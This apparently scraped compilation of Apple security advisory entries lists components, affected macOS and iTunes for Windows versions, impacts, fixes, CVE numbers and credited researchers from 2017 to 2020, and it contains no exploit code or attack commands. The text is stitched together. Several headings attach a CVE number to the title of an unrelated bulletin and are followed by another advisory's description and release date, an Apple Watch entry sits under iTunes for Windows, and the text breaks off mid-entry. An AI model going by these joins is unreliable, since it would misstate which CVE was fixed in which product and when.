CVE-2020-9785: Proteas of Qihoo 360 Nirvan Team

**libxml2**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.3

Impact: Multiple issues in libxml2

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2020-3909: LGTM.com

CVE-2020-3911: found by OSS-Fuzz

**libxml2**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.3

Impact: Multiple issues in libxml2

Description: A buffer overflow was addressed with improved size validation.

CVE-2020-3910: LGTM.com

**Mail**

Available for: macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A remote attacker may be able to cause arbitrary javascript code execution

Description: An injection issue was addressed with improved validation.

CVE-2020-3884: Apple

**Printing**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A malicious application may be able to overwrite arbitrary files

Description: A path handling issue was addressed with improved validation.

CVE-2020-3915: An anonymous researcher working with iDefense Labs (https://vcp.idefense.com/), HyungSeok Han (DaramG) @Theori working with TrendMicro’s Zero Day Initiative

Entry added May 1, 2020

**Safari**

Available for: macOS Catalina 10.15.3

Impact: A user's private browsing activity may be unexpectedly saved in Screen Time

Description: An issue existed in the handling of tabs displaying picture in picture video. The issue was corrected with improved state handling.

CVE-2020-9775: Andrian (@retroplasma), Marat Turaev, Marek Wawro (futurefinance.com) and Sambor Wawro of STO64 School Krakow Poland

Entry added May 13, 2020

**Sandbox**

Available for: macOS Catalina 10.15.3

Impact: A user may gain access to protected parts of the file system

Description: This issue was addressed with a new entitlement.

CVE-2020-9771: Csaba Fitzl (@theevilbit) of Offensive Security

Entry added May 21, 2020

**Sandbox**

Available for: macOS Catalina 10.15.3

Impact: A local user may be able to view sensitive user information

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2020-3918: an anonymous researcher, Augusto Alvarez of Outcourse Limited

Entry added April 8, 2020, updated May 21, 2020

**sudo**

Available for: macOS Catalina 10.15.3

Impact: An attacker may be able to run commands as a non-existent user

Description: This issue was addressed by updating to sudo version 1.8.31.

CVE-2019-19232

**sysdiagnose**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: An application may be able to trigger a sysdiagnose

Description: This issue was addressed with improved checks

CVE-2020-9786: Dayton Pidhirney (@\_watbulb) of Seekintoo (@seekintoo)

Entry added April 4, 2020

**TCC**

Available for: macOS Mojave 10.14.6, macOS Catalina 10.15.3

Impact: A maliciously crafted application may be able to bypass code signing enforcement

Description: A logic issue was addressed with improved restrictions.

CVE-2020-3906: Patrick Wardle of Jamf

**Time Machine**

Available for: macOS Catalina 10.15.3

Impact: A local user may be able to read arbitrary files

Description: A logic issue was addressed with improved state management.

CVE-2020-3889: Lasse Trolle Borup of Danish Cyber Defence

**Vim**

Available for: macOS Catalina 10.15.3

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating to version 8.1.1850.

CVE-2020-9769: Steve Hahn of LinkedIn

**WebKit**

Available for: macOS Catalina 10.15.3

Impact: Some websites may not have appeared in Safari Preferences

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9787: Ryan Pickren (ryanpickren.com)

Entry added April 8, 2020

**WebKit**

Available for: macOS Catalina 10.15.3

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: An input validation issue was addressed with improved input validation.

CVE-2020-3902: Yiğit Can YILMAZ (@yilmazcanyigit)

Entry added July 28, 2020

CVE-2020-3886: About the security content of macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra

CVE-2019-8643: Arun Sharma of VMWare This issue is fixed in macOS Mojave 10.14. Description: A logic issue was addressed with improved state management..

Released September 24, 2018

**Bluetooth**

Available for: iMac (21.5-inch, Late 2012), iMac (27-inch, Late 2012), iMac (21.5-inch, Late 2013), iMac (21.5-inch, Mid 2014), iMac (Retina 5K, 27-inch, Late 2014), iMac (21.5-inch, Late 2015), Mac mini (Mid 2011), Mac mini Server (Mid 2011), Mac mini (Late 2012), Mac mini Server (Late 2012), Mac mini (Late 2014), Mac Pro (Late 2013), MacBook Air (11-inch, Mid 2011), MacBook Air (13-inch, Mid 2011), MacBook Air (11-inch, Mid 2012), MacBook Air (13-inch, Mid 2012), MacBook Air (11-inch, Mid 2013), MacBook Air (13-inch, Mid 2013), MacBook Air (11-inch, Early 2015), MacBook Air (13-inch, Early 2015), MacBook Pro (13-inch, Mid 2012), MacBook Pro (15-inch, Mid 2012), MacBook Pro (Retina, 13-inch, Early 2013), MacBook Pro (Retina, 15-inch, Early 2013), MacBook Pro (Retina, 13-inch, Late 2013), and MacBook Pro (Retina, 15-inch, Late 2013)

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic

Description: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.

CVE-2018-5383: Lior Neumann and Eli Biham

The updates below are available for these Mac models: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013, Mid 2010, and Mid 2012 models with recommended Metal-capable graphics processor, including MSI Gaming Radeon RX 560 and Sapphire Radeon PULSE RX 580)

**afpserver**

Impact: A remote attacker may be able to attack AFP servers through HTTP clients

Description: An input validation issue was addressed with improved input validation.

CVE-2018-4295: Jianjun Chen (@whucjj) from Tsinghua University and UC Berkeley

Entry added October 30, 2018

**App Store**

Impact: A malicious application may be able to determine the Apple ID of the owner of the computer

Description: A permissions issue existed in the handling of the Apple ID. This issue was addressed with improved access controls.

CVE-2018-4324: Sergii Kryvoblotskyi of MacPaw Inc.

**AppleGraphicsControl**

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4417: Lee of the Information Security Lab Yonsei University working with Trend Micro's Zero Day Initiative

Entry added October 30, 2018

**Application Firewall**

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: A configuration issue was addressed with additional restrictions.

CVE-2018-4353: Abhinav Bansal of LinkedIn Inc.

Entry updated October 30, 2018

**APR**

Impact: Multiple buffer overflow issues existed in Perl

Description: Multiple issues in Perl were addressed with improved memory handling.

CVE-2017-12613: Craig Young of Tripwire VERT

CVE-2017-12618: Craig Young of Tripwire VERT

Entry added October 30, 2018

**ATS**

Impact: A malicious application may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4411: lilang wu moony Li of Trend Micro working with Trend Micro's Zero Day Initiative

Entry added October 30, 2018

**ATS**

Impact: An application may be able to read restricted memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2018-4308: Mohamed Ghannam (@\_simo36)

Entry added October 30, 2018

**Auto Unlock**

Impact: A malicious application may be able to access local users AppleIDs

Description: A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement.

CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.

**CFNetwork**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4126: Bruno Keith (@bkth\_) working with Trend Micro's Zero Day Initiative

Entry added October 30, 2018

**CoreFoundation**

Impact: A malicious application may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4412: The UK's National Cyber Security Centre (NCSC)

Entry added October 30, 2018

**CoreFoundation**

Impact: An application may be able to gain elevated privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4414: The UK's National Cyber Security Centre (NCSC)

Entry added October 30, 2018

**CoreText**

Impact: Processing a maliciously crafted text file may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2018-4347: Vasyl Tkachuk of Readdle

Entry added October 30, 2018, updated December 13, 2018

**Crash Reporter**

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4333: Brandon Azad

**CUPS**

Impact: In certain configurations, a remote attacker may be able to replace the message content from the print server with arbitrary content

Description: An injection issue was addressed with improved validation.

CVE-2018-4153: Michael Hanselmann of hansmi.ch

Entry added October 30, 2018

**CUPS**

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A denial of service issue was addressed with improved validation.

CVE-2018-4406: Michael Hanselmann of hansmi.ch

Entry added October 30, 2018

**Dictionary**

Impact: Parsing a maliciously crafted dictionary file may lead to disclosure of user information

Description: A validation issue existed which allowed local file access. This was addressed with input sanitization.

CVE-2018-4346: Wojciech Reguła (@\_r3ggi) of SecuRing

Entry added October 30, 2018

**DiskArbitration**

Impact: A malicious application may be able to modify contents of the EFI system partition and execute arbitrary code with kernel privileges if secure boot is not enabled

Description: A permissions issue existed in DiskArbitration. This was addressed with additional ownership checks.

CVE-2018-4296: Vitaly Cheptsov

Entry updated January 22, 2019

**dyld**

Impact: A malicious application may be able to modify protected parts of the file system

Description: A configuration issue was addressed with additional restrictions.

CVE-2018-4433: Vitaly Cheptsov

Entry updated January 22, 2019

**fdesetup**

Impact: Institutional recovery keys may be incorrectly reported as present

Description: A logic issue was addressed with improved state management.

CVE-2019-8643: Arun Sharma of VMWare

Entry added August 1, 2019

**Firmware**

Impact: An attacker with physical access to a device may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2017-5731: Intel and Eclypsium

CVE-2017-5732: Intel and Eclypsium

CVE-2017-5733: Intel and Eclypsium

CVE-2017-5734: Intel and Eclypsium

CVE-2017-5735: Intel and Eclypsium

Entry added June 24, 2019

**Grand Central Dispatch**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4426: Brandon Azad

Entry added October 30, 2018

**Heimdal**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4331: Brandon Azad

CVE-2018-4332: Brandon Azad

CVE-2018-4343: Brandon Azad

Entry added October 30, 2018

**Hypervisor**

Impact: Systems with microprocessors utilizing speculative execution and address translations may allow unauthorized disclosure of information residing in the L1 data cache to an attacker with local user access with guest OS privilege via a terminal page fault and a side-channel analysis

Description: An information disclosure issue was addressed by flushing the L1 data cache at the virtual machine entry.

CVE-2018-3646: Baris Kasikci, Daniel Genkin, Ofir Weisse, and Thomas F. Wenisch of University of Michigan, Mark Silberstein and Marina Minkin of Technion, Raoul Strackx, Jo Van Bulck, and Frank Piessens of KU Leuven, Rodrigo Branco, Henrique Kawakami, Ke Sun, and Kekai Hu of Intel Corporation, Yuval Yarom of The University of Adelaide

Entry added October 30, 2018

**iBooks**

Impact: Parsing a maliciously crafted iBooks file may lead to disclosure of user information

Description: A configuration issue was addressed with additional restrictions.

CVE-2018-4355: evi1m0 of bilibili security team

Entry added October 30, 2018

**Intel Graphics Driver**

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4396: Yu Wang of Didi Research America

CVE-2018-4418: Yu Wang of Didi Research America

Entry added October 30, 2018

**Intel Graphics Driver**

Impact: An application may be able to read restricted memory

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2018-4351: Appology Team @ Theori working with Trend Micro's Zero Day Initiative

Entry added October 30, 2018

**Intel Graphics Driver**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4350: Yu Wang of Didi Research America

Entry added October 30, 2018

**Intel Graphics Driver**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4334: Ian Beer of Google Project Zero

Entry added October 30, 2018

**Intel Graphics Driver**

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4451: Tyler Bohan of Cisco Talos

CVE-2018-4456: Tyler Bohan of Cisco Talos

Entry added December 21, 2018, updated January 22, 2019

**IOHIDFamily**

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4408: Ian Beer of Google Project Zero

Entry added October 30, 2018, updated August 1, 2019

**IOKit**

Impact: A malicious application may be able to break out of its sandbox

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4341: Ian Beer of Google Project Zero

CVE-2018-4354: Ian Beer of Google Project Zero

Entry added October 30, 2018

**IOKit**

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2018-4383: Apple

Entry added October 30, 2018

**IOUserEthernet**

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4401: Apple

Entry added October 30, 2018

**Kernel**

Impact: A malicious application may be able to leak sensitive user information

Description: An access issue existed with privileged API calls. This issue was addressed with additional restrictions.

CVE-2018-4399: Fabiano Anemone (@anoane)

Entry added October 30, 2018

**Kernel**

Impact: An attacker in a privileged network position may be able to execute arbitrary code

Description: A memory corruption issue was addressed with improved validation.

CVE-2018-4407: Kevin Backhouse of Semmle Ltd.

Entry added October 30, 2018

**Kernel**

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4336: Brandon Azad

CVE-2018-4337: Ian Beer of Google Project Zero

CVE-2018-4340: Mohamed Ghannam (@\_simo36)

CVE-2018-4344: The UK's National Cyber Security Centre (NCSC)

CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative, Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero Day Initiative

Entry updated October 30, 2018

**LibreSSL**

Impact: Multiple issues in libressl were addressed in this update

Description: Multiple issues were addressed by updating to libressl version 2.6.4.

CVE-2015-3194

CVE-2015-5333

CVE-2015-5334

CVE-2016-0702

Entry added October 30, 2018, updated December 13, 2018

**Login Window**

Impact: A local user may be able to cause a denial of service

Description: A validation issue was addressed with improved logic.

CVE-2018-4348: Ken Gannon of MWR InfoSecurity and Christian Demko of MWR InfoSecurity

Entry added October 30, 2018

**mDNSOffloadUserClient**

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4326: an anonymous researcher working with Trend Micro's Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team

Entry added October 30, 2018

**MediaRemote**

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs

Entry added October 30, 2018

**Microcode**

Impact: Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis

Description: An information disclosure issue was addressed with a microcode update. This ensures that older data read from recently-written-to addresses cannot be read via a speculative side-channel.

CVE-2018-3639: Jann Horn (@tehjh) of Google Project Zero (GPZ), Ken Johnson of the Microsoft Security Response Center (MSRC)

Entry added October 30, 2018

**Security**

Impact: A local user may be able to cause a denial of service

Description: This issue was addressed with improved checks.

CVE-2018-4395: Patrick Wardle of Digita Security

Entry added October 30, 2018

**Security**

Impact: An attacker may be able to exploit weaknesses in the RC4 cryptographic algorithm

Description: This issue was addressed by removing RC4.

CVE-2016-1777: Pepi Zawodsky

**Spotlight**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4393: Lufeng Li

Entry added October 30, 2018

**Symptom Framework**

Impact: An application may be able to read restricted memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2018-4203: Bruno Keith (@bkth\_) working with Trend Micro's Zero Day Initiative

Entry added October 30, 2018

**Text**

Impact: Processing a maliciously crafted text file may lead to a denial of service

Description: A denial of service issue was addressed with improved validation.

CVE-2018-4304: jianan.huang (@Sevck)

Entry added October 30, 2018

**Wi-Fi**

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4338: Lee @ SECLAB, Yonsei University working with Trend Micro's Zero Day Initiative

Entry added October 23, 2018

CVE-2019-8643: About the security content of macOS Mojave 10.14

A null pointer dereference was addressed with improved validation. This issue is fixed in macOS High Sierra 10.13, iCloud for Windows 7.0, watchOS 4, iOS 11, iTunes 12.7 for Windows. Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution.

Released September 12, 2017

**CFNetwork**

Available for: Windows 7 and later

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2017-13829: Niklas Baumstark and Samuel Gro working with Trend Micro's Zero Day Initiative 

CVE-2017-13833: Niklas Baumstark and Samuel Gro working with Trend Micro's Zero Day Initiative

Entry added November 10, 2017

**ImageIO**

Available for: Windows 7 and later

Impact: Processing a maliciously crafted image may lead to a denial of service

Description: An information disclosure issue existed in the processing of disk images. This issue was addressed through improved memory management.

CVE-2017-13831: Glen Carmichael

Entry added October 31, 2017, updated November 10, 2017

**libxml2**

Available for: Windows 7 and later

Impact: Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2017-9049: Wei Lei and Liu Yang - Nanyang Technological University in Singapore

Entry added October 18, 2018

**libxml2**

Available for: Windows 7 and later

Impact: Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2017-7376: an anonymous researcher

CVE-2017-5130: an anonymous researcher

Entry added October 18, 2018

**libxml2**

Available for: Windows 7 and later

Impact: Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2017-9050: Mateusz Jurczyk (j00ru) of Google Project Zero

Entry added October 18, 2018

**libxml2**

Available for: All Apple Watch models

Impact: Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution

Description: A null pointer dereference was addressed with improved validation.

CVE-2018-4302: Gustavo Grieco

Entry added October 18, 2018

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed through improved input validation.

CVE-2017-7081: Apple

Entry added September 25, 2017

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2017-7087: Apple

CVE-2017-7091: Wei Yuan of Baidu Security Lab working with Trend Micro’s Zero Day Initiative

CVE-2017-7092: Samuel Gro and Niklas Baumstark working with Trend Micro's Zero Day Initiative, Qixun Zhao (@S0rryMybad) of Qihoo 360 Vulcan Team

CVE-2017-7093: Samuel Gro and Niklas Baumstark working with Trend Micro’s Zero Day Initiative

CVE-2017-7094: Tim Michaud (@TimGMichaud) of Leviathan Security Group

CVE-2017-7095: Wang Junjie, Wei Lei, and Liu Yang of Nanyang Technological University working with Trend Micro’s Zero Day Initiative

CVE-2017-7096: Wei Yuan of Baidu Security Lab

CVE-2017-7098: Felipe Freitas of Instituto Tecnológico de Aeronáutica

CVE-2017-7099: Apple

CVE-2017-7100: Masato Kinugawa and Mario Heiderich of Cure53

CVE-2017-7102: Wang Junjie, Wei Lei, and Liu Yang of Nanyang Technological University

CVE-2017-7104: likemeng of Baidu Secutity Lab

CVE-2017-7107: Wang Junjie, Wei Lei, and Liu Yang of Nanyang Technological University

CVE-2017-7111: likemeng of Baidu Security Lab (xlab.baidu.com) working with Trend Micro's Zero Day Initiative

CVE-2017-7117: lokihardt of Google Project Zero

CVE-2017-7120: chenqin (陈钦) of Ant-financial Light-Year Security Lab

Entry added September 25, 2017

**WebKit**

Available for: Windows 7 and later

Impact: Cookies belonging to one origin may be sent to another origin

Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed by no longer returning cookies for custom URL schemes.

CVE-2017-7090: Apple

Entry added September 25, 2017

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: Application Cache policy may be unexpectedly applied.

CVE-2017-7109: avlidienbrunn

Entry added September 25, 2017

CVE-2018-4302: About the security content of iTunes 12.7 for Windows

A validation issue was addressed with improved logic. This issue is fixed in macOS High Sierra 10.13.5, Security Update 2018-003 Sierra, Security Update 2018-003 El Capitan. An attacker with physical access to a device may be able to elevate privileges.

Released June 1, 2018

**Accessibility Framework**

Available for: macOS High Sierra 10.13.4

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An information disclosure issue existed in Accessibility Framework. This issue was addressed with improved memory management.

CVE-2018-4196: Alex Plaskett, Georgi Geshev and Fabian Beterke of MWR Labs working with Trend Micro’s Zero Day Initiative, and WanderingGlitch of Trend Micro Zero Day Initiative

Entry updated July 19, 2018

**AMD**

Available for: macOS High Sierra 10.13.4

Impact: A local user may be able to read kernel memory

Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.

CVE-2018-4253: shrek\_wzw of Qihoo 360 Nirvan Team

**AMD**

Available for: macOS High Sierra 10.13.4

Impact: A local user may be able to read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2018-4256: shrek\_wzw of Qihoo 360 Nirvan Team

Entry added July 19, 2018

**AMD**

Available for: macOS High Sierra 10.13.4

Impact: A local user may be able to read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2018-4255: shrek\_wzw of Qihoo 360 Nirvan Team

Entry added October 18, 2018, updated December 14, 2018

**AMD**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An input validation issue existed in the kernel. This issue was addressed with improved input validation.

CVE-2018-4254: an anonymous researcher

Entry added October 18, 2018

**AMD**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An input validation issue existed in the kernel. This issue was addressed with improved input validation.

CVE-2018-4254: shrek\_wzw of Qihoo 360 Nirvan Team

Entry added October 24, 2018

**AppleGraphicsControl**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2018-4258: shrek\_wzw of Qihoo 360 Nirvan Team

Entry added October 18, 2018

**AppleGraphicsPowerManagement**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow was addressed with improved size validation.

CVE-2018-4257: shrek\_wzw of Qihoo 360 Nirvan Team

Entry added October 18, 2018

**apache\_mod\_php**

Available for: macOS High Sierra 10.13.4

Impact: Issues in php were addressed in this update

Description: This issue was addressed by updating to php version 7.1.16.

CVE-2018-7584: Wei Lei and Liu Yang of Nanyang Technological University

**ATS**

Available for: macOS High Sierra 10.13.4

Impact: A malicious application may be able to elevate privileges

Description: A type confusion issue was addressed with improved memory handling.

CVE-2018-4219: Mohamed Ghannam (@\_simo36)

**Bluetooth**

Available for: MacBook Pro (Retina, 15-inch, Mid 2015), MacBook Pro (Retina, 15-inch, 2015), MacBook Pro (Retina, 13-inch, Early 2015), MacBook Pro (15-inch, 2017), MacBook Pro (15-inch, 2016), MacBook Pro (13-inch, Late 2016, Two Thunderbolt 3 Ports), MacBook Pro (13-inch, Late 2016, Four Thunderbolt 3 Ports), MacBook Pro (13-inch, 2017, Four Thunderbolt 3 Ports), MacBook (Retina, 12-inch, Early 2016), MacBook (Retina, 12-inch, Early 2015), MacBook (Retina, 12-inch, 2017), iMac Pro, iMac (Retina 5K, 27-inch, Late 2015), iMac (Retina 5K, 27-inch, 2017), iMac (Retina 4K, 21.5-inch, Late 2015), iMac (Retina 4K, 21.5-inch, 2017), iMac (21.5-inch, Late 2015), and iMac (21.5-inch, 2017)

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic

Description: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.

CVE-2018-5383: Lior Neumann and Eli Biham

Entry added July 23, 2018

**Bluetooth**

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6

Impact: A malicious application may be able to determine kernel memory layout.

Description: An information disclosure issue existed in device properties. This issue was addressed with improved object management.

CVE-2018-4171: shrek\_wzw of Qihoo 360 Nirvan Team

**CoreGraphics**

Available for: macOS High Sierra 10.13.4

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab

Entry added June 21, 2018

**CUPS**

Available for: macOS High Sierra 10.13.4

Impact: A local process may modify other processes without entitlement checks

Description: An issue existed in CUPS. This issue was addressed with improved access restrictions.

CVE-2018-4180: Dan Bastone of Gotham Digital Science

Entry added July 11, 2018

**CUPS**

Available for: macOS High Sierra 10.13.4

Impact: A local user may be able to read arbitrary files as root

Description: An issue existed in CUPS. This issue was addressed with improved access restrictions.

CVE-2018-4181: Eric Rafaloff and John Dunlap of Gotham Digital Science

Entry added July 11, 2018

**CUPS**

Available for: macOS High Sierra 10.13.4

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions on CUPS.

CVE-2018-4182: Dan Bastone of Gotham Digital Science

Entry added July 11, 2018

**CUPS**

Available for: macOS High Sierra 10.13.4

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2018-4183: Dan Bastone and Eric Rafaloff of Gotham Digital Science

Entry added July 11, 2018

**EFI**

Available for: macOS High Sierra 10.13.4

Impact: An attacker with physical access to a device may be able to elevate privileges

Description: A validation issue was addressed with improved logic.

CVE-2018-4478: an anonymous researcher, an anonymous researcher, Ben Erickson of Trusted Computer Consulting, LLC

Entry added February 15, 2019

**Firmware**

Available for: macOS High Sierra 10.13.4

Impact: A malicious application with root privileges may be able to modify the EFI flash memory region

Description: A device configuration issue was addressed with an updated configuration.

CVE-2018-4251: Maxim Goryachy and Mark Ermolov

**FontParser**

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4

Impact: Processing a maliciously crafted font file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2018-4211: Proteas of Qihoo 360 Nirvan Team

**Grand Central Dispatch**

Available for: macOS High Sierra 10.13.4

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An issue existed in parsing entitlement plists. This issue was addressed with improved input validation.

CVE-2018-4229: Jakob Rieck (@0xdead10cc) of the Security in Distributed Systems Group, University of Hamburg

**Graphics Drivers**

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4159: Axis and pjf of IceSword Lab of Qihoo 360

**Hypervisor**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2018-4242: Zhuo Liang of Qihoo 360 Nirvan Team

Entry added October 30, 2018

**iBooks**

Available for: macOS High Sierra 10.13.4

Impact: An attacker in a privileged network position may be able to spoof password prompts in iBooks

Description: An input validation issue was addressed with improved input validation.

CVE-2018-4202: Jerry Decime

**Identity Services**

Available for: macOS High Sierra 10.13.4

Impact: A malicious application may be able to access local users AppleIDs

Description: A privacy issue in the handling of Open Directory records was addressed with improved indexing.

CVE-2018-4217: Jacob Greenfield of Commonwealth School

Entry added December 10, 2018

**Intel Graphics Driver**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4141: an anonymous researcher, Zhao Qixun (@S0rryMybad) of Qihoo 360 Vulcan Team

**IOFireWireAVC**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2018-4228: Benjamin Gnahm (@mitp0sh) of Mentor Graphics

**IOGraphics**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4236: Zhao Qixun(@S0rryMybad) of Qihoo 360 Vulcan Team

**IOHIDFamily**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4234: Proteas of Qihoo 360 Nirvan Team

**Kernel**

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4249: Kevin Backhouse of Semmle Ltd.

Entry updated December 18, 2018

**Kernel**

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: In some circumstances, some operating systems may not expect or properly handle an Intel architecture debug exception after certain instructions. The issue appears to be from an undocumented side effect of the instructions. An attacker might utilize this exception handling to gain access to Ring 0 and access sensitive memory or control operating system processes.

CVE-2018-8897: Andy Lutomirski, Nick Peterson (linkedin.com/in/everdox) of Everdox Tech LLC

**Kernel**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2018-4241: Ian Beer of Google Project Zero

CVE-2018-4243: Ian Beer of Google Project Zero

**libxpc**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved validation.

CVE-2018-4237: Samuel Groß (@5aelo) working with Trend Micro’s Zero Day Initiative

**libxpc**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4404: Samuel Groß (@5aelo) working with Trend Micro’s Zero Day Initiative

Entry added October 30, 2018

**Mail**

Available for: macOS High Sierra 10.13.4

Impact: An attacker may be able to exfiltrate the contents of S/MIME- encrypted e-mail

